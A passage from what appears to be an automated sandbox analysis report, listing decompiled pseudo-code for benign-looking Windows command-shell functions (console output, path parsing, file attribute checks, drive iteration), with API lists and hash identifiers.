                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,002B64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 002B9885
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,002B65F0,?,002B64F0), ref: 002B98C4
                                              • _get_osfhandle.MSVCRT ref: 002B98DD
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,002B64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 002B98E5
                                                • Part of subcall function 002B27C8: _get_osfhandle.MSVCRT ref: 002B27DB
                                                • Part of subcall function 002B27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,002DB980,000000FF,002CD620,00002000,00000000,00000000), ref: 002B281C
                                                • Part of subcall function 002B27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,002CD620,-00000001,?,00000000), ref: 002B2831
                                              • longjmp.MSVCRT(002DB8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 002B9968
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                              • String ID:
                                              • API String ID: 1333215474-0
                                              • Opcode ID: f6124e0cf3c183c92b7c6e3340850e8ee675383a4ec8240eb753138700f6657f
                                              • Instruction ID: c685109e79d7da65cf3294641e8e0c78870aa371bb01f208cfa999b99b2ec150
                                              • Opcode Fuzzy Hash: f6124e0cf3c183c92b7c6e3340850e8ee675383a4ec8240eb753138700f6657f
                                              • Instruction Fuzzy Hash: E051D931B60301ABDB25AF75D889BEEB3A8EB05751F10452EE606D7182EB71DDA0CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AC923, Relevance: 10.8, APIs: 7, Instructions: 281COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E002AC923(signed short** __ecx) {
				signed short* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed short _t33;
				signed int _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed int _t38;
				void* _t39;
				signed int _t40;
				signed int _t41;
				WCHAR* _t42;
				WCHAR* _t47;
				signed int _t48;
				signed int _t49;
				void* _t54;
				long _t56;
				int _t62;
				signed short _t64;
				signed int _t69;
				signed int _t70;
				signed short* _t72;
				signed short* _t74;
				intOrPtr _t75;
				WCHAR* _t77;
				signed int _t79;
				signed char _t80;
				signed short* _t82;
				WCHAR* _t84;
				WCHAR* _t90;
				signed int _t95;
				signed short* _t107;
				signed int _t108;
				short* _t109;
				short* _t111;
				WCHAR* _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				WCHAR** _t121;
				signed short* _t122;
				signed int _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				WCHAR* _t129;
				int _t130;
				signed int _t131;
				WCHAR* _t132;

				_t121 = __ecx;
				_v12 = 0x2a1f8c;
				 *0x2e3cf0 = 0;
				_t82 =  *__ecx;
				_t122 = _t82;
				_t2 =  &(_t122[1]); // 0x2
				_t107 = _t2;
				do {
					_t33 =  *_t122;
					_t122 =  &(_t122[1]);
				} while (_t33 != 0);
				_t34 =  *_t82 & 0x0000ffff;
				_t124 = _t122 - _t107 >> 1;
				_t74 = _t82;
				_v20 = _t124;
				_t108 = _t34;
				if(_t34 == 0) {
					L6:
					_t35 = 0x3a;
					_v8 = _t74;
					_v24 = _t35;
					if(_t108 == _t35) {
						__eflags = _t124 - 2;
						if(_t124 <= 2) {
							goto L7;
						}
						 *_t74 = 0;
						_t24 = _t74 - 2; // -2
						_v8 = _t24;
						_t62 = SetErrorMode(0);
						_t102 =  *_t121;
						_v16 = _t62;
						_t132 = E002AD120( *_t121, 0x8000, _t82);
						__eflags = _t132 - 0xffffffff;
						if(_t132 == 0xffffffff) {
							L49:
							__eflags =  *0x2cd0dc - 4;
							_t64 = 0x3a;
							_v8 = _t74;
							 *_t74 = _t64;
							if( *0x2cd0dc != 4) {
								E002AC5A2(_t102, 0x236b, 1,  *_t121);
							} else {
								__eflags =  *0x2cd5a8;
								if( *0x2cd5a8 == 0) {
									E002AC5A2(_t102, 0x236b, 1,  *_t121);
								}
								 *0x2cd5a4 = 1;
							}
							__eflags = _t132 - 0xffffffff;
							L55:
							if(__eflags == 0) {
								L57:
								SetErrorMode(_v16);
								goto L7;
							}
							L56:
							E002ADB92(_t132);
							goto L57;
						}
						_t69 = E002B0178(_t63);
						__eflags = _t69;
						if(_t69 != 0) {
							L47:
							_t70 = E002B0178(_t69);
							__eflags = _t70;
							if(_t70 != 0) {
								goto L56;
							}
							__eflags = E002C9953(_t70, _t132);
							goto L55;
						}
						_t102 = _t132;
						_t69 = E002C9953(_t69, _t132);
						__eflags = _t69;
						if(_t69 == 0) {
							goto L49;
						}
						goto L47;
					}
					L7:
					_t83 = 0x250;
					_t36 = E002B00B0(0x250);
					if(_t36 == 0) {
						L58:
						E002C9287(_t83);
						__imp__longjmp(0x2db8b8, 1);
						L59:
						_t125 =  *_t121;
						_t75 = 0;
						__eflags = 0;
						_t84 = _t125;
						_t29 =  &(_t84[1]); // 0x0
						_t109 = _t29;
						do {
							_t38 =  *_t84;
							_t84 =  &(_t84[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						__eflags = _t84 - _t109 >> 1 - 2;
						if(_t84 - _t109 >> 1 >= 2) {
							_t38 = 0x3a;
							__eflags = _t125[1] - _t38;
							if(_t125[1] == _t38) {
								_t125 =  &(_t125[2]);
							}
						}
						L11:
						__imp___wcsicmp(_t125, ".");
						if(_t38 == 0) {
							L39:
							_t126 =  *_t121;
							_t39 = 0x5c;
							_t40 = E002B2349(_t126, _t39);
							__eflags = _t40;
							if(_t40 == 0) {
								_t90 = _t126;
								__eflags = 0;
								_t31 =  &(_t90[1]); // 0x0
								_t111 = _t31;
								do {
									_t41 =  *_t90;
									_t90 =  &(_t90[1]);
									__eflags = _t41;
								} while (_t41 != 0);
								__eflags = _t90 - _t111 >> 1 - 2;
								if(_t90 - _t111 >> 1 != 2) {
									goto L40;
								}
								_t54 = 0x3a;
								__eflags = _t126[1] - _t54;
								if(_t126[1] == _t54) {
									L42:
									 *(_t121[6]) = 0x10;
									L17:
									_t79 = 1;
									_t129 = 0;
									_t47 =  *_t121;
									_t114 = _t47;
									while(1) {
										_t95 =  *_t114 & 0x0000ffff;
										if(_t95 == 0) {
											break;
										}
										if(_t95 == _v16) {
											L23:
											_t129 = _t114;
											L21:
											_t114 =  &(_t114[1]);
											_t79 = _t79 + 1;
											continue;
										}
										if(_t95 == _v24) {
											__eflags = _t79 - 2;
											if(_t79 != 2) {
												goto L21;
											}
											goto L23;
										}
										goto L21;
									}
									_t121[3] = _t129;
									__eflags = _t129;
									if(_t129 == 0) {
										_t129 = _t47;
									} else {
										__eflags =  *_t129;
										if( *_t129 == 0) {
											_t47 = _t129;
										} else {
											_t12 =  &(_t129[1]); // 0x2
											_t47 = _t12;
										}
									}
									_t115 = 0x2a;
									_t121[4] = _t47;
									_t48 = E002AD7D4(_t129, _t115);
									__eflags = _t48;
									if(_t48 == 0) {
										_t116 = 0x3f;
										_t49 = E002AD7D4(_t129, _t116);
										__eflags = _t49;
										if(_t49 == 0) {
											goto L29;
										}
										goto L28;
									} else {
										L28:
										_t14 =  &(_t121[7]);
										 *_t14 = _t121[7] | 0x00000008;
										__eflags =  *_t14;
										 *0x2e3cd0 = 1;
										L29:
										_t117 = 0x2e;
										_t121[5] = E002AD7D4(_t129, _t117);
										__eflags = 1;
										return 1;
									}
								}
							}
							L40:
							_t77 =  *_t121;
							_t83 = _v20 + 5 + _v20 + 5;
							_t42 = E002B00B0(_v20 + 5 + _v20 + 5);
							__eflags = _t42;
							if(_t42 == 0) {
								goto L58;
							}
							 *_t121 = _t42;
							E002B1040(_t42, _t128, _t77);
							E002B18C0( *_t121, _t128, _v12);
							goto L42;
						}
						__imp___wcsicmp(_t125, L"..");
						if(_t38 == 0) {
							goto L39;
						}
						if( *0x2cd0dc == 4) {
							__eflags =  *0x2cd5ac - 1;
							if( *0x2cd5ac == 1) {
								goto L14;
							}
							__eflags =  *0x2cd0c0 - 1;
							if( *0x2cd0c0 != 1) {
								goto L17;
							}
							 *0x2cd0c0 = _t75;
						}
						L14:
						_t80 = GetFileAttributesW( *_t121);
						if(_t80 != 0xffffffff) {
							_t56 = 0;
						} else {
							_t56 = GetLastError();
						}
						 *0x2e3cf0 = _t56;
						if(_t80 != 0xffffffff) {
							__eflags = _t80 & 0x00000010;
							if((_t80 & 0x00000010) == 0) {
								goto L17;
							}
							goto L39;
						} else {
							goto L17;
						}
					}
					_t121[6] = _t36;
					_t130 = 0x5c;
					_v16 = _t130;
					if(( *_v8 & 0x0000ffff) == _t130) {
						_v12 = 0x2a1f8e;
						goto L39;
					}
					_t38 = E002B2349( *_t121, _t130);
					_t131 = _t38;
					if(_t131 == 0) {
						goto L59;
					}
					_t125 = _t131 + 2;
					_t75 = 0;
					goto L11;
				} else {
					goto L4;
					L4:
					_t72 = _t82;
					_t74 = _t82;
					_t82 =  &(_t82[1]);
					if( *_t82 != 0) {
						goto L4;
					} else {
						_t108 =  *_t72 & 0x0000ffff;
						goto L6;
					}
				}
			}





















































                                              0x002ac92e
                                              0x002ac930
                                              0x002ac939
                                              0x002ac93f
                                              0x002ac941
                                              0x002ac943
                                              0x002ac943
                                              0x002ac946
                                              0x002ac946
                                              0x002ac949
                                              0x002ac94c
                                              0x002ac951
                                              0x002ac956
                                              0x002ac958
                                              0x002ac95a
                                              0x002ac95d
                                              0x002ac962
                                              0x002ac975
                                              0x002ac977
                                              0x002ac978
                                              0x002ac97b
                                              0x002ac981
                                              0x002baff7
                                              0x002baffa
                                              0x00000000
                                              0x00000000
                                              0x002bb002
                                              0x002bb005
                                              0x002bb008
                                              0x002bb00e
                                              0x002bb015
                                              0x002bb01c
                                              0x002bb024
                                              0x002bb026
                                              0x002bb029
                                              0x002bb057
                                              0x002bb057
                                              0x002bb060
                                              0x002bb061
                                              0x002bb064
                                              0x002bb067
                                              0x002bb098
                                              0x002bb069
                                              0x002bb069
                                              0x002bb070
                                              0x002bb07b
                                              0x002bb080
                                              0x002bb083
                                              0x002bb083
                                              0x002bb0a0
                                              0x002bb0a3
                                              0x002bb0a3
                                              0x002bb0ac
                                              0x002bb0af
                                              0x00000000
                                              0x002bb0af
                                              0x002bb0a5
                                              0x002bb0a7
                                              0x00000000
                                              0x002bb0a7
                                              0x002bb02d
                                              0x002bb032
                                              0x002bb034
                                              0x002bb041
                                              0x002bb043
                                              0x002bb048
                                              0x002bb04a
                                              0x00000000
                                              0x00000000
                                              0x002bb053
                                              0x00000000
                                              0x002bb053
                                              0x002bb036
                                              0x002bb038
                                              0x002bb03d
                                              0x002bb03f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bb03f
                                              0x002ac987
                                              0x002ac987
                                              0x002ac98c
                                              0x002ac993
                                              0x002bb0ba
                                              0x002bb0ba
                                              0x002bb0c6
                                              0x002bb0cc
                                              0x002bb0cc
                                              0x002bb0ce
                                              0x002bb0ce
                                              0x002bb0d0
                                              0x002bb0d2
                                              0x002bb0d2
                                              0x002bb0d5
                                              0x002bb0d5
                                              0x002bb0d8
                                              0x002bb0db
                                              0x002bb0db
                                              0x002bb0e4
                                              0x002bb0e7
                                              0x002bb0ef
                                              0x002bb0f0
                                              0x002bb0f4
                                              0x002bb0fa
                                              0x002bb0fa
                                              0x002bb0f4
                                              0x002ac9c9
                                              0x002ac9cf
                                              0x002ac9d9
                                              0x002acaf4
                                              0x002acaf4
                                              0x002acafa
                                              0x002acafd
                                              0x002acb02
                                              0x002acb04
                                              0x002bb102
                                              0x002bb104
                                              0x002bb106
                                              0x002bb106
                                              0x002bb109
                                              0x002bb109
                                              0x002bb10c
                                              0x002bb10f
                                              0x002bb10f
                                              0x002bb118
                                              0x002bb11b
                                              0x00000000
                                              0x00000000
                                              0x002bb123
                                              0x002bb124
                                              0x002bb128
                                              0x002acb3a
                                              0x002acb3d
                                              0x002aca29
                                              0x002aca2b
                                              0x002aca2e
                                              0x002aca30
                                              0x002aca32
                                              0x002aca34
                                              0x002aca34
                                              0x002aca3a
                                              0x00000000
                                              0x00000000
                                              0x002aca40
                                              0x002aca53
                                              0x002aca53
                                              0x002aca48
                                              0x002aca48
                                              0x002aca4b
                                              0x00000000
                                              0x002aca4b
                                              0x002aca46
                                              0x002aca4e
                                              0x002aca51
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aca51
                                              0x00000000
                                              0x002aca46
                                              0x002aca57
                                              0x002aca5a
                                              0x002aca5c
                                              0x002bb13a
                                              0x002aca62
                                              0x002aca64
                                              0x002aca67
                                              0x002bb133
                                              0x002aca6d
                                              0x002aca6d
                                              0x002aca6d
                                              0x002aca6d
                                              0x002aca67
                                              0x002aca72
                                              0x002aca75
                                              0x002aca78
                                              0x002aca7d
                                              0x002aca7f
                                              0x002acaa8
                                              0x002acaab
                                              0x002acab0
                                              0x002acab2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aca81
                                              0x002aca81
                                              0x002aca81
                                              0x002aca81
                                              0x002aca81
                                              0x002aca85
                                              0x002aca8f
                                              0x002aca91
                                              0x002aca99
                                              0x002acaa0
                                              0x002acaa5
                                              0x002acaa5
                                              0x002aca7f
                                              0x002bb12e
                                              0x002acb0a
                                              0x002acb0d
                                              0x002acb12
                                              0x002acb15
                                              0x002acb1a
                                              0x002acb1c
                                              0x00000000
                                              0x00000000
                                              0x002acb25
                                              0x002acb29
                                              0x002acb35
                                              0x00000000
                                              0x002acb35
                                              0x002ac9e5
                                              0x002ac9ef
                                              0x00000000
                                              0x00000000
                                              0x002ac9fc
                                              0x002acac8
                                              0x002acacf
                                              0x00000000
                                              0x00000000
                                              0x002acad5
                                              0x002acadc
                                              0x00000000
                                              0x00000000
                                              0x002acae2
                                              0x002acae2
                                              0x002aca02
                                              0x002aca0a
                                              0x002aca0f
                                              0x002acab6
                                              0x002aca15
                                              0x002aca15
                                              0x002aca15
                                              0x002aca1b
                                              0x002aca23
                                              0x002acabd
                                              0x002acac0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aca23
                                              0x002ac999
                                              0x002ac9a1
                                              0x002ac9a2
                                              0x002ac9ab
                                              0x002acaed
                                              0x00000000
                                              0x002acaed
                                              0x002ac9b5
                                              0x002ac9ba
                                              0x002ac9be
                                              0x00000000
                                              0x00000000
                                              0x002ac9c4
                                              0x002ac9c7
                                              0x00000000
                                              0x002ac964
                                              0x002ac964
                                              0x002ac966
                                              0x002ac966
                                              0x002ac968
                                              0x002ac96a
                                              0x002ac970
                                              0x00000000
                                              0x002ac972
                                              0x002ac972
                                              0x00000000
                                              0x002ac972
                                              0x002ac970

                                              APIs
                                              • _wcsicmp.MSVCRT ref: 002AC9CF
                                              • _wcsicmp.MSVCRT ref: 002AC9E5
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 002ACA04
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002ACA15
                                                • Part of subcall function 002AD7D4: wcschr.MSVCRT ref: 002AD7DA
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                              • String ID:
                                              • API String ID: 2943530692-0
                                              • Opcode ID: d099fc1393b987f8aa949eae8c5aef25d2a5a13e0b0f014f4f99153ea159f604
                                              • Instruction ID: 55e4bdd154fca97daa6911faf8619fcc4db70e625febf20ce813fb7a072e8824
                                              • Opcode Fuzzy Hash: d099fc1393b987f8aa949eae8c5aef25d2a5a13e0b0f014f4f99153ea159f604
                                              • Instruction Fuzzy Hash: 02913B31B30216DBDB25EF68D8956BB73A0BB4A750F34452AD816D72C1EFB08D61CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B5E50, Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E002B5E50(void* __ecx) {
				intOrPtr _v8;
				long _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				short _v52;
				WCHAR* _v54;
				signed char _v56;
				signed int _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				long _v72;
				long _v80;
				WCHAR* _v88;
				signed char* _v92;
				short _v104;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t61;
				WCHAR* _t65;
				short _t66;
				void* _t67;
				void* _t68;
				void* _t74;
				short _t77;
				void* _t78;
				short _t82;
				wchar_t* _t85;
				signed char _t86;
				short _t89;
				short _t90;
				wchar_t* _t102;
				long _t103;
				short* _t104;
				short _t105;
				long _t106;
				short* _t109;
				signed int _t110;
				WCHAR* _t114;
				WCHAR* _t126;
				short _t132;
				long _t134;
				WCHAR* _t138;
				short* _t142;
				void* _t147;
				WCHAR* _t149;
				void* _t150;
				signed int _t155;
				signed int _t157;
				short _t163;

				_t110 = _t155;
				_push(__ecx);
				_push(__ecx);
				_t157 = (_t155 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t110 + 4));
				_t153 = _t157;
				_push(0xfffffffe);
				_push(0x2cbe38);
				_push(E002B7290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t110);
				_t60 =  *0x2cd0b4; // 0x40f69e4c
				_v20 = _v20 ^ _t60;
				_t61 = _t60 ^ _t157;
				_v48 = _t61;
				_push(_t61);
				 *[fs:0x0] =  &_v28;
				_v36 = _t157 - 0x48;
				_t65 = E002AEA40( *((intOrPtr*)( *((intOrPtr*)(_t110 + 8)) + 0x3c)), 0, 0 |  *0x2e3cc9 != 0x00000000);
				_t149 = _t65;
				_v64 = _t149;
				_v68 = _t149;
				if( *0x2e3cc9 == 0) {
					L6:
					_t114 = _t149;
					_t15 =  &(_t114[1]); // 0x2
					_t142 = _t15;
					do {
						_t66 =  *_t114;
						_t114 =  &(_t114[1]);
					} while (_t66 != 0);
					_v60 = _t114 - _t142 >> 1;
					_t67 = E002B22C0(_t110, _t149);
					_t144 = _v60 + 1;
					_t118 = _t149;
					_t68 = E002B1040(_t149, _v60 + 1, _t67);
					 *0x2db8b0 = 0;
					if( *_t149 == 0) {
						E002C83FD(_t68, _t118);
						L18:
						 *[fs:0x0] = _v28;
						_pop(_t147);
						_pop(_t150);
						return E002B6FD0( *0x2db8b0, _t110, _v48 ^ _t153, _t144, _t147, _t150);
					}
					if(E002B5D59(_t110) == 0) {
						_push(0);
						_push(0x40002728);
						L47:
						E002AC5A2(_t118);
						 *0x2db8b0 = 1;
						goto L18;
					}
					if( *0x2e3cc9 == 0) {
						L12:
						_t171 =  *0x2db8b0;
						if( *0x2db8b0 != 0) {
							L45:
							_t74 = E002B4B96(_t110, 0, _t149, __eflags);
							RtlFreeHeap(GetProcessHeap(), 0, _t74);
							_push(0);
							_push( *0x2db8b0);
							goto L47;
						}
						_t144 = 0;
						_t118 = _t149;
						_t77 = E002B33FC(_t110, _t149, 0, 0, _t149, _t171);
						 *0x2db8b0 = _t77;
						if(_t77 == 0) {
							_t78 = 0x3a;
							if(_t149[1] == _t78) {
								if( *0x2e3cb8 == 0) {
									_t118 = 0x2e3ab0;
								}
								_t144 =  *0x2e3cc0;
								E002B36CB(_t110, _t118,  *0x2e3cc0,  *_t149 & 0x0000ffff);
							}
						}
						if( *0x2db8b0 != 0) {
							goto L45;
						}
						goto L18;
					}
					_t144 = 0x5c;
					if( *_t149 == _t144) {
						__eflags = _t149[1] - _t144;
						if(__eflags != 0) {
							goto L12;
						}
						_t126 = _t149;
						_t24 =  &(_t126[1]); // 0x2
						_v60 = _t24;
						do {
							_t82 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t82;
						} while (_t82 != 0);
						_v72 = (_t126 - _v60 >> 1) + 1;
						_t29 =  &(_t149[2]); // 0x4
						_t85 = wcschr(_t29, _t144);
						_v60 = _t85;
						__eflags = _t85;
						if(_t85 != 0) {
							_t134 = 0x5c;
							_t102 = wcschr( &(_t85[0]), _t134);
							_v60 = _t102;
							__eflags = _t102;
							if(_t102 != 0) {
								_t103 = GetFileAttributesW(_t149);
								__eflags = _t103 - 0xffffffff;
								if(_t103 != 0xffffffff) {
									_t104 = _v60;
									 *_t104 = 0;
									_t105 = _t104 + 2;
									__eflags = _t105;
									_v60 = _t105;
								} else {
									_t106 = GetLastError();
									 *0x2db8b0 = _t106;
									__eflags = _t106 - 2;
									if(_t106 == 2) {
										 *0x2db8b0 = 3;
									}
								}
							}
						}
						_t86 = 0x5a;
						_v56 = _t86;
						_t118 = 0x3a;
						_v54 = _t118;
						__eflags = 0;
						_v52 = 0;
						_v104 = 1;
						_v92 =  &_v56;
						_v88 = _t149;
						_v80 = 0;
						while(1) {
							__eflags =  *0x2db8b0;
							if(__eflags != 0) {
								goto L45;
							}
							__eflags = _v56 - 0x41;
							if(__eflags == 0) {
								goto L12;
							}
							_v16 = 0;
							_t89 = E002B7797(_t118);
							__eflags = _t89;
							if(_t89 == 0) {
								 *0x2db8b0 = 0x78;
							} else {
								 *0x2db8b0 =  *0x2ec030( &_v108, 0, 0, 0);
							}
							_v16 = 0xfffffffe;
							_t90 =  *0x2db8b0;
							__eflags = _t90;
							if(_t90 == 0) {
								_t144 = _v56;
								 *((short*)( *0x2e3ce8 +  *0x2e3ce4 * 8 - 4)) = _v56;
								 *_t149 = _v56;
								_t149[1] = _v54;
								_t132 = 0x5c;
								_t149[2] = _t132;
								_t118 =  &(_v68[3]);
								_t94 = _v60;
								__eflags = _v60;
								if(__eflags == 0) {
									 *_t118 = 0;
								} else {
									_t144 = _v72;
									E002B1040(_t118, _v72, _t94);
								}
								goto L12;
							} else {
								__eflags = _t90 - 0x55;
								if(_t90 == 0x55) {
									L41:
									_v56 = (_v56 & 0x000000ff) - 1;
									 *0x2db8b0 = 0;
									continue;
								}
								__eflags = _t90 - 0x4b2;
								if(_t90 != 0x4b2) {
									continue;
								}
								goto L41;
							}
						}
						goto L45;
					}
					goto L12;
				} else {
					_t138 = _t149;
					_t163 =  *_t149;
					L3:
					_v60 = _t65;
					if(_t163 != 0) {
						_t65 = _t138;
						_t138 =  &(_t138[1]);
						__eflags =  *_t138;
						goto L3;
					}
					L4:
					while(_t65 > _t149 && iswspace( *_t65 & 0x0000ffff) != 0) {
						_t109 = _v60;
						 *_t109 = 0;
						_t65 = _t109 - 2;
						_v60 = _t65;
					}
					goto L6;
				}
			}


























































                                              0x002b5e53
                                              0x002b5e55
                                              0x002b5e56
                                              0x002b5e5a
                                              0x002b5e61
                                              0x002b5e65
                                              0x002b5e67
                                              0x002b5e69
                                              0x002b5e6e
                                              0x002b5e79
                                              0x002b5e7a
                                              0x002b5e7b
                                              0x002b5e7c
                                              0x002b5e80
                                              0x002b5e85
                                              0x002b5e88
                                              0x002b5e8a
                                              0x002b5e8f
                                              0x002b5e93
                                              0x002b5e99
                                              0x002b5eb0
                                              0x002b5eb5
                                              0x002b5eb7
                                              0x002b5eba
                                              0x002b5ec6
                                              0x002b5ef3
                                              0x002b5ef3
                                              0x002b5ef5
                                              0x002b5ef5
                                              0x002b5ef8
                                              0x002b5ef8
                                              0x002b5efb
                                              0x002b5efe
                                              0x002b5f07
                                              0x002b5f0c
                                              0x002b5f15
                                              0x002b5f16
                                              0x002b5f18
                                              0x002b5f1d
                                              0x002b5f26
                                              0x002bf393
                                              0x002b5f9c
                                              0x002b5fa4
                                              0x002b5fac
                                              0x002b5fad
                                              0x002b5fbe
                                              0x002b5fbe
                                              0x002b5f33
                                              0x002bf55a
                                              0x002bf55b
                                              0x002bf560
                                              0x002bf560
                                              0x002bf566
                                              0x00000000
                                              0x002bf570
                                              0x002b5f40
                                              0x002b5f4e
                                              0x002b5f4e
                                              0x002b5f55
                                              0x002bf53d
                                              0x002bf53d
                                              0x002bf54b
                                              0x002bf551
                                              0x002bf552
                                              0x00000000
                                              0x002bf552
                                              0x002b5f5b
                                              0x002b5f5d
                                              0x002b5f5f
                                              0x002b5f64
                                              0x002b5f6b
                                              0x002b5f6f
                                              0x002b5f74
                                              0x002b5f7e
                                              0x002b5fc1
                                              0x002b5fc1
                                              0x002b5f84
                                              0x002b5f8a
                                              0x002b5f8a
                                              0x002b5f74
                                              0x002b5f96
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b5f96
                                              0x002b5f44
                                              0x002b5f48
                                              0x002bf39d
                                              0x002bf3a1
                                              0x00000000
                                              0x00000000
                                              0x002bf3a7
                                              0x002bf3a9
                                              0x002bf3ac
                                              0x002bf3af
                                              0x002bf3af
                                              0x002bf3b2
                                              0x002bf3b5
                                              0x002bf3b5
                                              0x002bf3c2
                                              0x002bf3c6
                                              0x002bf3ca
                                              0x002bf3d2
                                              0x002bf3d5
                                              0x002bf3d7
                                              0x002bf3db
                                              0x002bf3e1
                                              0x002bf3e9
                                              0x002bf3ec
                                              0x002bf3ee
                                              0x002bf3f1
                                              0x002bf3f7
                                              0x002bf3fa
                                              0x002bf41a
                                              0x002bf41d
                                              0x002bf420
                                              0x002bf420
                                              0x002bf423
                                              0x002bf3fc
                                              0x002bf3fc
                                              0x002bf402
                                              0x002bf407
                                              0x002bf40a
                                              0x002bf40c
                                              0x002bf40c
                                              0x002bf40a
                                              0x002bf3fa
                                              0x002bf3ee
                                              0x002bf428
                                              0x002bf429
                                              0x002bf42f
                                              0x002bf430
                                              0x002bf434
                                              0x002bf436
                                              0x002bf43a
                                              0x002bf444
                                              0x002bf447
                                              0x002bf44a
                                              0x002bf44d
                                              0x002bf44d
                                              0x002bf454
                                              0x00000000
                                              0x00000000
                                              0x002bf45a
                                              0x002bf45f
                                              0x00000000
                                              0x00000000
                                              0x002bf465
                                              0x002bf468
                                              0x002bf46d
                                              0x002bf46f
                                              0x002bf485
                                              0x002bf471
                                              0x002bf47e
                                              0x002bf47e
                                              0x002bf48f
                                              0x002bf4c0
                                              0x002bf4c5
                                              0x002bf4c7
                                              0x002bf4ee
                                              0x002bf4fd
                                              0x002bf506
                                              0x002bf50d
                                              0x002bf513
                                              0x002bf514
                                              0x002bf51b
                                              0x002bf51e
                                              0x002bf521
                                              0x002bf523
                                              0x002bf535
                                              0x002bf525
                                              0x002bf526
                                              0x002bf529
                                              0x002bf529
                                              0x00000000
                                              0x002bf4c9
                                              0x002bf4c9
                                              0x002bf4cc
                                              0x002bf4d9
                                              0x002bf4df
                                              0x002bf4e3
                                              0x00000000
                                              0x002bf4e3
                                              0x002bf4ce
                                              0x002bf4d3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bf4d3
                                              0x002bf4c7
                                              0x00000000
                                              0x002bf44d
                                              0x00000000
                                              0x002b5ec8
                                              0x002b5ec8
                                              0x002b5eca
                                              0x002b5ed7
                                              0x002b5ed7
                                              0x002b5eda
                                              0x002b5ecf
                                              0x002b5ed1
                                              0x002b5ed4
                                              0x00000000
                                              0x002b5ed4
                                              0x00000000
                                              0x002b5edc
                                              0x002bf382
                                              0x002bf385
                                              0x002bf388
                                              0x002bf38b
                                              0x002bf38b
                                              0x00000000
                                              0x002b5edc

                                              APIs
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEAB7
                                                • Part of subcall function 002AEA40: iswspace.MSVCRT ref: 002AEB2D
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB49
                                                • Part of subcall function 002AEA40: wcschr.MSVCRT ref: 002AEB6D
                                              • iswspace.MSVCRT ref: 002B5EE4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcschr$iswspace
                                              • String ID:
                                              • API String ID: 3458554142-0
                                              • Opcode ID: a411283f6cc95fbf7f3049bc08109166ff36be64d14fe55f499d797a5ead468f
                                              • Instruction ID: 291ff3aaf9720c72c0ce91cee263235a9cf93bbd746861e3d892cc7cbfb1c084
                                              • Opcode Fuzzy Hash: a411283f6cc95fbf7f3049bc08109166ff36be64d14fe55f499d797a5ead468f
                                              • Instruction Fuzzy Hash: 2F91CE70924295DBDB24DF68EC59AEEB7F4FF48380F14812EE806DB290EB709950CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C4CF0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 249registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E002C4CF0(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t38;
				int _t42;
				signed int _t44;
				signed int _t45;
